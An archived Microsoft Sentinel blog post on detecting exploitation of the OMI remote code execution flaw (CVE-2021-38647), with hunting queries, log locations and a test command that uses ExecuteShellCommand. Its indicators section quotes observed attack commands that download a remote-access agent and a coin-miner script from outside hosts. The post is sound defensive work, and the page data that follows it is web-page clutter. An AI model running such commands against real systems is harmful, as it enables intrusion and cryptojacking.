{
	"id": "94c0a89d-9e02-4e88-b837-9c875ec48fbf",
	"created_at": "2026-04-06T01:30:29.515401Z",
	"updated_at": "2026-04-10T03:20:44.063643Z",
	"deleted_at": null,
	"sha1_hash": "24e45f419cf7fb1521dd57c704036b0e68a2f72e",
	"title": "Hunting for OMI Vulnerability Exploitation with Azure Sentinel",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 247874,
	"plain_text": "Hunting for OMI Vulnerability Exploitation with Azure Sentinel\r\nBy russmc\r\nPublished: 2021-09-18 · Archived: 2026-04-06 00:15:41 UTC\r\n1. Microsoft Community Hub\r\n2.\r\n3. Microsoft Sentinel\r\n4. Microsoft Sentinel Blog\r\nBlog Post\r\nMicrosoft Sentinel Blog\r\n8 MIN READ\r\nSep 18, 2021\r\nRussell McDonald, Roberto Rodriguez, and Ajeet Prakash\r\nSpecial thanks to: Ross Bevington \r\nFollowing the September 14th, 2021 release of three Elevation of Privilege (EoP) vulnerabilities (CVE-2021-38645, CVE-2021-38649, CVE-2021-38648) and one unauthenticated Remote Code Execution (RCE) vulnerability (CVE-2021-38647)\r\nin the Open Management Infrastructure (OMI) Framework, analysts in the Microsoft Threat Intelligence Center (MSTIC)\r\nhave been monitoring for signs of exploitation and investigating detections to further protect customers. Following the\r\nMSRC guidance to block ports that you aren't using and to ensure the OMI service is patched are great first steps. In this\r\nblog, we have some things to share about current attacks in the wild, agents and software involved, indicators for defenders\r\nto look for on host machines, and to share new detections in Azure Sentinel.\r\nAt Microsoft we monitor for attacks against our cloud services to inform our future security research, track emerging threats,\r\nand to improve the detection coverage of our security offerings.  As part of that work, MSTIC is monitoring for exploitation\r\nof the OMI related RCE (CVE-2021-38647).  To date we have seen several active exploitation attempts ranging from basic\r\nhost enumeration (running uname, id, ps commands) to attempts to install a crypto currency miner or file share. (Details\r\navailable below in Hunting cues section). We have also seen others in the community report similar behavior to include\r\ninstalls of the Mirai botnet. While many of the attackers are looking for port 5986, we are also seeing attacks on port 1270. 
\r\nDue to the number of easily adaptable proof-of-concept exploits available and the volume of reconnaissance-type attacks, we\r\nare anticipating an increase in the number of effects-type attacks (coin miners, bot installation, etc.).\r\nOMI is an open-source project to further the development of a production quality implementation of the OMI CIMOM is\r\nalso designed to be portable and highly modular. In order to attain its small footprint, it is coded in C, which also makes it a\r\nmuch more viable CIM Object Manager for embedded systems and other infrastructure components that have memory\r\nconstraints for their management processor. OMI is also designed to be inherently portable. It builds and runs today on most\r\nUNIX® systems and Linux. In addition to OMI's small footprint, it also demonstrates very high performance.\r\nIn a nutshell, anyone with access to an endpoint running a vulnerable version (less than 1.6.8.1) of the OMI agent can\r\nexecute arbitrary commands over an HTTP request without an authorization header. The expected behavior would be a 401\r\nUnauthorized response. However, the user is able to execute commands with root privileges.\r\nMore details are available in the MSRC CVE-2021-38647 post and in the blog post by Wiz, the company that found the vulnerability.\r\nIn addition to monitoring for incoming connections over ports 5986, 5985 or 1270 to vulnerable systems, there is more to\r\nexplore at the endpoint level.\r\nSCXcore, which started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including\r\nMicrosoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.\r\nThe SCXcore provides a CIMOM provider, based on OMI, to return logging and statistical information for a UNIX or Linux\r\nsystem. 
There are several providers or classes available through the SCXcore provider which can be used to gather\r\ninformation from an endpoint such as  MemoryStatisticalInformation or FileSystemStatisticalInformation.\r\nIn addition, there is one support provider named the RunAsProvider which provides the following classes:\r\nExecuteCommand: Executes any UNIX/Linux native command\r\nhttps://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093\r\nPage 1 of 38\n\nExecuteShellCommand: Executes any UNIX/Linux command using the /bin/sh shell\r\nExecuteScript: Executes any UNIX/Linux script using the /bin/sh shell\r\nBased on the initial research from Wiz, the following command was used to explore network traffic in order to craft an\r\nHTTP request to test the vulnerability:\r\n/opt/omi/bin/omicli --hostname 192.168.1.1 -u azureuser -p Password1 iv root/scx { SCX_OperatingSystem }\r\nExecuteShellCommand { command 'id' timeout 0 }\r\nDuring testing, we used the Scxadmin tool, available as part of SCX, to increase all logging to VERBOSE and identify\r\nadditional sources of data. The following command was used:\r\n/opt/microsoft/scx/bin/tools/scxadmin -log-set all verbose\r\nAfter running public proof-of-concepts to test the vulnerability, we validated that the code was being handled by the\r\nRunAsProvider :: Invoke_ExecuteShellCommand class:\r\nChecking logs from auditd via Syslog, we also identified where the code was being executed from:\r\nWe tested the same in our lab environments, and we observed the same behavior which is shown below:\r\nLooking at the code behind the components of the RunAs providers, there are some references to it:\r\nMore information about SCXcore is available here: GitHub - microsoft/SCXcore: System Center Cross Platform Provider\r\nfor Operations Manager\r\nSimilarly, scripts can be run using the ExecuteScript provider. 
In this case, the body of the HTTP request contains a reference\r\nto ExecuteScript. In the example below, the command ‘id’ is base64-encoded to ‘aWQ=’:\r\nIn this case, the script is passed into a temp directory which you can see in the execve logs. Look for a command line similar\r\nto /bin/sh /etc/opt/microsoft/scx/conf/tmpdir/scx*. This command will still show as being run from the same\r\n/var/opt/microsoft/scx/tmp current working directory.\r\nOf note, this is the method we have seen used by attackers attempting to install coin miners.\r\nAzure Sentinel coverage\r\nRelevant security data required for understanding the impact of an attack is produced in multiple locations. Azure Sentinel\r\nmakes it easy to collect data from multiple data sources. This section of the post contains guidance and generic\r\napproaches to look for OMI-related activity in various data feeds that are available by default in Azure Sentinel or can be\r\nonboarded to Azure Sentinel.\r\nSome Azure products, such as Configuration Management, open an HTTP/S port (1270/5985/5986) listening for OMI.\r\nAttackers can exploit the vulnerability in OMI where these ports are open by sending a specially crafted message via\r\nHTTPS to the port listening for OMI to gain initial access to the machine.\r\nThe Azure Sentinel query linked below tries to identify connection attempts from external IP addresses to the OMI\r\nmanagement ports (5985, 5986, 1270). The query primarily leverages the Network Session normalization schema\r\n(imNetworkSession) as well as a few other logs to look for this network connection activity from an external IP address.\r\nWhere available, it tries to restrict the results to the relevant OMI process. 
The results can sometimes be noisy; hence the\r\nquery has been shipped as a hunting query.\r\nNormalizing parsers for leveraging the imNetworkSession normalized schema are required for this query to work and can be\r\ndeployed in a click using an ARM Template.\r\nCustomers can also use Heartbeat logs, which monitor agent health, to find vulnerable machines. The Azure Sentinel query\r\nlinked below tries to leverage Heartbeat data to find OMS agents that are reporting to the Azure Sentinel workspace but are\r\nnot updated to the latest version that prevents this vulnerability.\r\n[updated Sept 27, 2021]\r\nAdditionally, Azure Security Center generates detailed security recommendations if there are vulnerable machines in an\r\nAzure environment with OMI installed. With the continuous export feature of Security Center, these security\r\nrecommendations can be imported into Azure Sentinel. Azure Sentinel leverages the data populated in the Security Nested\r\nRecommendations table to build a detection query to show vulnerable machines.\r\nAzure Service Health has also sent notifications to potentially impacted customers. 
In the impacted environments,\r\ncustomers can run a quick query to check if they are impacted by this vulnerability.\r\nAzureActivity\r\n| where CategoryValue == 'ServiceHealth'\r\n| where isnotempty(Properties) and Properties has 'CVE-2021-38645'\r\n| extend defaultLanguageTitle = tostring(parse_json(tostring(parse_json(Properties).eventProperties)).defaultLanguageTitle)\r\n[updated Sept 24, 2021]\r\nThe hunting query below uses security events from the Microsoft Audit Collection Tool (AUOMS) collected via the Azure\r\nSentinel Syslog data connector to explore the use of SCX Execute RunAs providers.\r\nExecute RunAs providers such as ExecuteShellCommand and ExecuteScript can be used to execute any UNIX/Linux\r\ncommand and script respectively using the /bin/sh shell. Execution occurs from the /var/opt/microsoft/scx/tmp directory and,\r\ndepending on the execution RunAs provider, execution can be a command or a script. If the ExecuteScript RunAs provider\r\nis used, then the script file is created in the following directory /bin/sh /etc/opt/microsoft/scx/conf/tmpdir/ with the prefix scx\r\n(e.g. scxzOy96). SCXcore, which started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of\r\nproducts including Microsoft Operations Manager, 
Microsoft Azure, and Microsoft Operations Management Suite.\r\nHunting cues and IOCs\r\nCommon enumeration commands seen: uname -a, id, netstat, ps\r\nExploitation attempt: wget hxxps://www.dwservice.net/download/dwagent_generic.sh -O dwagent_generic.sh\r\nExploitation attempt: echo curl hxxps://www.dwservice.net/download/dwagent_generic.sh --output dw.sh \u003e go.sh\r\nExploitation attempt: curl -fSsL hxxp://104.168.213.31:55879/coinlinux/runMiner.sh\r\nReferences:\r\nMSRC communications:\r\nCVE-2021-38647 - Security Update Guide - Microsoft - Open Management Infrastructure Remote Code Execution Vulnerability\r\nAdditional Guidance Regarding OMI Vulnerabilities within Azure VM Management Extensions – Microsoft Security Response Center\r\nAzure Security Center Guidance:\r\nUsing ASC to find machines affected by OMI vulnerabilities in Azure VM Management Extensions - Microsoft Tech Community\r\nSentinel Detections:\r\nAzure-Sentinel/NetworkConnectiontoOMIPorts.yaml at master · Azure/Azure-Sentinel · GitHub\r\nAzure-Sentinel/OMIGODVulnerableMachines.yaml at master · Azure/Azure-Sentinel · GitHub\r\nAzure-Sentinel/SCXExecuteRunAsProviders.yml at master · Azure/Azure-Sentinel (github.com) [updated Sept 24, 2021]\r\nSoftware and tools:\r\nGitHub - microsoft/SCXcore: System Center Cross Platform Provider for Operations Manager\r\nGitHub - microsoft/Build-omi: Build projects required for OMI (Open Management Infrastructure)\r\nAzure-Sentinel2Go/grocery-list/Linux/demos/CVE-2021-38647-OMI at master · 
OTRF/Azure-Sentinel2Go\r\n(github.com)\r\nPublic Discussion About Attacks in the wild:\r\nchris doman on Twitter: \":loudspeaker:OMIGOD (CVE-2021-38647) is now under active exploitation :loudspeaker:\r\nWe took at a look at one of the first samples - yup, it's Mirai! If you're running Linux on Azure, check to see if OMI\r\nis installed https://t.co/o3nr82RgH1 https://t.co/kbbt1T52d3\" / Twitter\r\nAndrew Morris on Twitter: \"The Azure \"OHMIGOD\" vulnerability (CVE-2021-38647) is increasing a good bit. ~10\r\nIPs opportunistically exploiting the vuln across the internet this morning, ~80 now. Tags available to all GN users and\r\ncustomers now. GNQL: cve:CVE-2021-38647 https://t.co/sbdxJxzrEd https://t.co/7dyU213Pl1\" / Twitter\r\nKevin Beaumont on Twitter: \"Oh Mirai fixed their binary, it now supports proper OMIGOD exploitation. Given\r\nMirai can enter networks and spread laterally via multiple vulns, this might be problematic.\r\nhttps://t.co/8nXSEcMHYa\" / Twitter\r\nUpdated Nov 03, 2021\r\nVersion 
11.0\r\n\"}},\"componentScriptGroups({\\\"componentId\\\":\\\"custom.widget.SocialSharing\\\"})\":\r\n{\"__typename\":\"ComponentScriptGroups\",\"scriptGroups\":\r\n{\"__typename\":\"ComponentScriptGroupsDefinition\",\"afterInteractive\":\r\n{\"__typename\":\"PageScriptGroupDefinition\",\"group\":\"AFTER_INTERACTIVE\",\"scriptIds\":[]},\"lazyOnLoad\":\r\n{\"__typename\":\"PageScriptGroupDefinition\",\"group\":\"LAZY_ON_LOAD\",\"scriptIds\":[]}},\"componentScripts\":\r\n[]},\"component({\\\"componentId\\\":\\\"custom.widget.MicrosoftFooter\\\"})\":\r\n{\"__typename\":\"Component\",\"render({\\\"context\\\":{\\\"component\\\":{\\\"entities\\\":[],\\\"props\\\":{}},\\\"page\\\":{\\\"entities\\\":\r\n[\\\"message:2764093\\\"],\\\"name\\\":\\\"BlogMessagePage\\\",\\\"props\\\":\r\n{},\\\"url\\\":\\\"https://techcommunity.microsoft.com/blog/microsoftsentinelblog/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/2764093\\\"}}})\":{\"__typename\":\"ComponentRenderResult\",\"html\":\"\r\n\"}},\"componentScriptGroups({\\\"componentId\\\":\\\"custom.widget.MicrosoftFooter\\\"})\":\r\n{\"__typename\":\"ComponentScriptGroups\",\"scriptGroups\":\r\n{\"__typename\":\"ComponentScriptGroupsDefinition\",\"afterInteractive\":\r\n{\"__typename\":\"PageScriptGroupDefinition\",\"group\":\"AFTER_INTERACTIVE\",\"scriptIds\":[]},\"lazyOnLoad\":\r\n{\"__typename\":\"PageScriptGroupDefinition\",\"group\":\"LAZY_ON_LOAD\",\"scriptIds\":[]}},\"componentScripts\":\r\n[]},\"cachedText({\\\"lastModified\\\":\\\"1775111751222\\\",\\\"locale\\\":\\\"en-US\\\",\\\"namespaces\\\":\r\n[\\\"components/community/NavbarDropdownToggle\\\"]})\":[{\"__ref\":\"CachedAsset:text:en_US-components/community/NavbarDropdownToggle-1775111751222\"}],\"cachedText({\\\"lastModified\\\":\\\"1775111751222\\\",\\\"locale\\\":\\\"en-US\\\",\\\"namespaces\\\":\r\n[\\\"components/messages/MessageCoverImage\\\"]})\":[{\"__ref\":\"CachedAsset:text:en_US-components/messages/MessageCoverImage-1775111751222\"}],\"cac
hedText({\\\"lastModified\\\":\\\"1775111751222\\\",\\\"locale\\\":\\\"en-US\\\",\\\"namespaces\\\":\r\n[\\\"shared/client/components/nodes/NodeTitle\\\"]})\":[{\"__ref\":\"CachedAsset:text:en_US-shared/client/components/nodes/NodeTitle-1775111751222\"}],\"cachedText({\\\"lastModified\\\":\\\"1775111751222\\\",\\\"locale\\\":\\\"en-US\\\",\\\"namespaces\\\":\r\n[\\\"components/messages/MessageTimeToRead\\\"]})\":[{\"__ref\":\"CachedAsset:text:en_US-components/messages/MessageTimeToRead-https://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093\r\nPage 4 of 38\n\n1775111751222\"}],\"cachedText({\\\"lastModified\\\":\\\"1775111751222\\\",\\\"locale\\\":\\\"en-US\\\",\\\"namespaces\\\":\r\n[\\\"components/messages/MessageSubject\\\"]})\":[{\"__ref\":\"CachedAsset:text:en_US-components/messages/MessageSubject-1775111751222\"}],\"cachedText({\\\"lastModified\\\":\\\"1775111751222\\\",\\\"locale\\\":\\\"en-US\\\",\\\"namespaces\\\":\r\n[\\\"components/users/UserLink\\\"]})\":[{\"__ref\":\"CachedAsset:text:en_US-components/users/UserLink-1775111751222\"}],\"cachedText({\\\"lastModified\\\":\\\"1775111751222\\\",\\\"locale\\\":\\\"en-US\\\",\\\"namespaces\\\":\r\n[\\\"shared/client/components/users/UserRank\\\"]})\":[{\"__ref\":\"CachedAsset:text:en_US-shared/client/components/users/UserRank-1775111751222\"}],\"cachedText({\\\"lastModified\\\":\\\"1775111751222\\\",\\\"locale\\\":\\\"en-US\\\",\\\"namespaces\\\":\r\n[\\\"components/messages/MessageTime\\\"]})\":[{\"__ref\":\"CachedAsset:text:en_US-components/messages/MessageTime-1775111751222\"}],\"cachedText({\\\"lastModified\\\":\\\"1775111751222\\\",\\\"locale\\\":\\\"en-US\\\",\\\"namespaces\\\":\r\n[\\\"components/messages/MessageBody\\\"]})\":[{\"__ref\":\"CachedAsset:text:en_US-components/messages/MessageBody-1775111751222\"}],\"cachedText({\\\"lastModified\\\":\\\"1775111751222\\\",\\\"locale\\\":\\\"en-US\\\",\\\"namespaces\\\":\r\n[\\\"componen
ts/messages/MessageCustomFields\\\"]})\":[{\"__ref\":\"CachedAsset:text:en_US-components/messages/MessageCustomFields-1775111751222\"}],\"cachedText({\\\"lastModified\\\":\\\"1775111751222\\\",\\\"locale\\\":\\\"en-US\\\",\\\"namespaces\\\":\r\n[\\\"components/messages/MessageRevision\\\"]})\":[{\"__ref\":\"CachedAsset:text:en_US-components/messages/MessageRevision-1775111751222\"}],\"cachedText({\\\"lastModified\\\":\\\"1775111751222\\\",\\\"locale\\\":\\\"en-US\\\",\\\"namespaces\\\":\r\n[\\\"shared/client/components/common/QueryHandler\\\"]})\":[{\"__ref\":\"CachedAsset:text:en_US-shared/client/components/common/QueryHandler-1775111751222\"}],\"cachedText({\\\"lastModified\\\":\\\"1775111751222\\\",\\\"locale\\\":\\\"en-US\\\",\\\"namespaces\\\":\r\n[\\\"components/tags/TagList\\\"]})\":[{\"__ref\":\"CachedAsset:text:en_US-components/tags/TagList-1775111751222\"}],\"cachedText({\\\"lastModified\\\":\\\"1775111751222\\\",\\\"locale\\\":\\\"en-US\\\",\\\"namespaces\\\":\r\n[\\\"components/messages/MessageReplyButton\\\"]})\":[{\"__ref\":\"CachedAsset:text:en_US-components/messages/MessageReplyButton-1775111751222\"}],\"cachedText({\\\"lastModified\\\":\\\"1775111751222\\\",\\\"locale\\\":\\\"en-US\\\",\\\"namespaces\\\":\r\n[\\\"components/messages/MessageAuthorBio\\\"]})\":[{\"__ref\":\"CachedAsset:text:en_US-components/messages/MessageAuthorBio-1775111751222\"}],\"cachedText({\\\"lastModified\\\":\\\"1775111751222\\\",\\\"locale\\\":\\\"en-US\\\",\\\"namespaces\\\":\r\n[\\\"shared/client/components/users/UserAvatar\\\"]})\":[{\"__ref\":\"CachedAsset:text:en_US-shared/client/components/users/UserAvatar-1775111751222\"}],\"cachedText({\\\"lastModified\\\":\\\"1775111751222\\\",\\\"locale\\\":\\\"en-US\\\",\\\"namespaces\\\":\r\n[\\\"shared/client/components/ranks/UserRankLabel\\\"]})\":[{\"__ref\":\"CachedAsset:text:en_US-shared/client/components/ranks/UserRankLabel-1775111751222\"}],\"cachedText({\\\"lastModified\\\":\\\"1775111751222\\\",\\\"locale\\\":\\\"en-US\
\\",\\\"namespaces\\\":\r\n[\\\"components/tags/TagView/TagViewChip\\\"]})\":[{\"__ref\":\"CachedAsset:text:en_US-components/tags/TagView/TagViewChip-1775111751222\"}],\"cachedText({\\\"lastModified\\\":\\\"1775111751222\\\",\\\"locale\\\":\\\"en-US\\\",\\\"namespaces\\\":\r\n[\\\"components/users/UserRegistrationDate\\\"]})\":[{\"__ref\":\"CachedAsset:text:en_US-components/users/UserRegistrationDate-1775111751222\"}],\"cachedText({\\\"lastModified\\\":\\\"1775111751222\\\",\\\"locale\\\":\\\"en-US\\\",\\\"namespaces\\\":\r\n[\\\"shared/client/components/nodes/NodeAvatar\\\"]})\":[{\"__ref\":\"CachedAsset:text:en_US-shared/client/components/nodes/NodeAvatar-1775111751222\"}],\"cachedText({\\\"lastModified\\\":\\\"1775111751222\\\",\\\"locale\\\":\\\"en-US\\\",\\\"namespaces\\\":\r\n[\\\"shared/client/components/nodes/NodeDescription\\\"]})\":[{\"__ref\":\"CachedAsset:text:en_US-shared/client/components/nodes/NodeDescription-1775111751222\"}],\"cachedText({\\\"lastModified\\\":\\\"1775111751222\\\",\\\"locale\\\":\\\"en-US\\\",\\\"namespaces\\\":\r\n[\\\"shared/client/components/nodes/NodeIcon\\\"]})\":[{\"__ref\":\"CachedAsset:text:en_US-shared/client/components/nodes/NodeIcon-1775111751222\"}]},\"Theme:customTheme1\":\r\n{\"__typename\":\"Theme\",\"id\":\"customTheme1\"},\"User:user:-1\":\r\n{\"__typename\":\"User\",\"id\":\"user:-1\",\"entityType\":\"USER\",\"eventPath\":\"community:gxcuf89792/user:-1\",\"uid\":-1,\"login\":\"Anonymous\",\"email\":\"\",\"ava\r\n{\"__typename\":\"RegistrationData\",\"status\":\"ANONYMOUS\",\"registrationTime\":null,\"confirmEmailStatus\":false,\"registrationAccessLevel\":\"VIEW\",\"ss\r\n[]},\"ssoId\":null,\"profileSettings\":{\"__typename\":\"ProfileSettings\",\"dateDisplayStyle\":\r\n{\"__typename\":\"InheritableStringSettingWithPossibleValues\",\"key\":\"layout.friendly_dates_enabled\",\"value\":\"false\",\"localValue\":\"true\",\"possibleValues\"\r\n[\"true\",\"false\"]},\"dateDisplayFormat\":\r\n{\"__typename\":\"InheritableSt
ringSetting\",\"key\":\"layout.format_pattern_date\",\"value\":\"MMM dd yyyy\",\"localValue\":\"MM-dd-yyyy\"},\"language\":{\"__typename\":\"InheritableStringSettingWithPossibleValues\",\"key\":\"profile.language\",\"value\":\"en-US\",\"localValue\":null,\"possibleValues\":[\"en-US\",\"es-ES\"]},\"repliesSortOrder\":\r\n{\"__typename\":\"InheritableStringSettingWithPossibleValues\",\"key\":\"config.user_replies_sort_order\",\"value\":\"DEFAULT\",\"localValue\":\"DEFAULT\",\"po\r\n[\"DEFAULT\",\"LIKES\",\"PUBLISH_TIME\",\"REVERSE_PUBLISH_TIME\"]}},\"deleted\":false},\"CachedAsset:pages-1775111737889\":{\"__typename\":\"CachedAsset\",\"id\":\"pages-1775111737889\",\"value\":\r\n[{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"BlogViewAllPostsPage\",\"type\":\"BLOG\",\"urlPath\":\"/category/:categoryId/blog/:boardId/all-posts/(/:after|/:before)?\",\"__typename\":\"PageDescriptor\"},\"__typename\":\"PageResource\"},\r\nhttps://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093\r\nPage 5 of 
38\n\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"CasePortalPage\",\"type\":\"CASE_PORTAL\",\"urlPath\":\"/caseportal\",\"__typename\":\"PageDescriptor\"},\"__typename\":\"PageResource\"},\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"CreateGroupHubPage\",\"type\":\"GROUP_HUB\",\"urlPath\":\"/groups/create\",\"__typename\":\"PageDescriptor\"},\"__typename\":\"PageResource\"},\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"CaseViewPage\",\"type\":\"CASE_DETAILS\",\"urlPath\":\"/case/:caseId/:caseNumber\",\"__typename\":\"PageDescriptor\"},\"__typename\":\"PageResource\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"InboxPage\",\"type\":\"COMMUNITY\",\"urlPath\":\"/inbox\",\"__typename\":\"PageDescriptor\"},\"__typename\":\"PageResource\"},\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"HelpFAQPage\",\"type\":\"COMMUNITY\",\"urlPath\":\"/help\",\"__typename\":\"PageDescriptor\"},\"__typename\":\"PageResource\"},\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"IdeaMessagePage\",\"type\":\"IDEA_POST\",\"urlPath\":\"/idea/:boardId/:messageSubject/:messageId\",\"__typename\":\"PageDescriptor\"},\"__typename\"\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"IdeaViewAllIdeasPage\",\"type\":\"IDEA\",\"urlPath\":\"/category/:categoryId/ideas/:boardId/all-ideas/(/:after|/:before)?\",\"__typename\":\"PageDescriptor\"},\"__typename\":\"PageResource\"},\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"LoginPage\",\"type\":\"USER\",\"urlPath\":\"/signin\",\"__typename\":\"PageDescriptor\"},\"__typename\":\"PageResource\"},\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"WorkstreamsPage\",\"type\":\"COMMUNITY\",\"urlPath\":\"/workstreams\",\"__typename\":\"Pag
eDescriptor\"},\"__typename\":\"PageResource\"},\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"BlogPostPage\",\"type\":\"BLOG\",\"urlPath\":\"/category/:categoryId/blogs/:boardId/create\",\"__typename\":\"PageDescriptor\"},\"__typename\":\"PageRes\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"UserBlogPermissions.Page\",\"type\":\"COMMUNITY\",\"urlPath\":\"/c/user-blog-permissions/page\",\"__typename\":\"PageDescriptor\"},\"__typename\":\"PageResource\"},\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"ThemeEditorPage\",\"type\":\"COMMUNITY\",\"urlPath\":\"/designer/themes\",\"__typename\":\"PageDescriptor\"},\"__typename\":\"PageResource\"},\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"TkbViewAllArticlesPage\",\"type\":\"TKB\",\"urlPath\":\"/category/:categoryId/kb/:boardId/all-articles/(/:after|/:before)?\",\"__typename\":\"PageDescriptor\"},\"__typename\":\"PageResource\"},\r\n{\"lastUpdatedTime\":1730819800000,\"localOverride\":null,\"page\":\r\n{\"id\":\"AllEvents\",\"type\":\"CUSTOM\",\"urlPath\":\"/Events\",\"__typename\":\"PageDescriptor\"},\"__typename\":\"PageResource\"},\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"OccasionEditPage\",\"type\":\"EVENT\",\"urlPath\":\"/event/:boardId/:messageSubject/:messageId/edit\",\"__typename\":\"PageDescriptor\"},\"__typename\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"OAuthAuthorizationAllowPage\",\"type\":\"USER\",\"urlPath\":\"/auth/authorize/allow\",\"__typename\":\"PageDescriptor\"},\"__typename\":\"PageResource\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"PageEditorPage\",\"type\":\"COMMUNITY\",\"urlPath\":\"/designer/pages\",\"__typename\":\"PageDescriptor\"},\"__typename\":\"PageResource\"},\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":n
ull,\"page\":\r\n{\"id\":\"PostPage\",\"type\":\"COMMUNITY\",\"urlPath\":\"/category/:categoryId/:boardId/create\",\"__typename\":\"PageDescriptor\"},\"__typename\":\"PageResou\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"CreateUserGroup.Page\",\"type\":\"COMMUNITY\",\"urlPath\":\"/c/create-user-group/page\",\"__typename\":\"PageDescriptor\"},\"__typename\":\"PageResource\"},\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"ForumBoardPage\",\"type\":\"FORUM\",\"urlPath\":\"/category/:categoryId/discussions/:boardId\",\"__typename\":\"PageDescriptor\"},\"__typename\":\"Pag\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"TkbBoardPage\",\"type\":\"TKB\",\"urlPath\":\"/category/:categoryId/kb/:boardId\",\"__typename\":\"PageDescriptor\"},\"__typename\":\"PageResource\"},\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"EventPostPage\",\"type\":\"EVENT\",\"urlPath\":\"/category/:categoryId/events/:boardId/create\",\"__typename\":\"PageDescriptor\"},\"__typename\":\"PageR\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"UserBadgesPage\",\"type\":\"COMMUNITY\",\"urlPath\":\"/users/:login/:userId/badges\",\"__typename\":\"PageDescriptor\"},\"__typename\":\"PageResourc\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"GroupHubMembershipAction\",\"type\":\"GROUP_HUB\",\"urlPath\":\"/membership/join/:nodeId/:membershipType\",\"__typename\":\"PageDescriptor\"}\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"MaintenancePage\",\"type\":\"COMMUNITY\",\"urlPath\":\"/maintenance\",\"__typename\":\"PageDescriptor\"},\"__typename\":\"PageResource\"},\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"IdeaReplyPage\",\"type\":\"IDEA_REPLY\",\"urlPath\":\"/idea/:boardId/:messageSubject/:messageId/comments/:re
plyId\",\"__typename\":\"PageDescripto\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"UserSettingsPage\",\"type\":\"USER\",\"urlPath\":\"/mysettings/:userSettingsTab\",\"__typename\":\"PageDescriptor\"},\"__typename\":\"PageResource\"},\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"GroupHubsPage\",\"type\":\"GROUP_HUB\",\"urlPath\":\"/groups\",\"__typename\":\"PageDescriptor\"},\"__typename\":\"PageResource\"},\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"ForumPostPage\",\"type\":\"FORUM\",\"urlPath\":\"/category/:categoryId/discussions/:boardId/create\",\"__typename\":\"PageDescriptor\"},\"__typename\":\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"OccasionRsvpActionPage\",\"type\":\"OCCASION\",\"urlPath\":\"/event/:boardId/:messageSubject/:messageId/rsvp/:responseType\",\"__typename\":\"Pag\r\nhttps://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093\r\nPage 6 of 
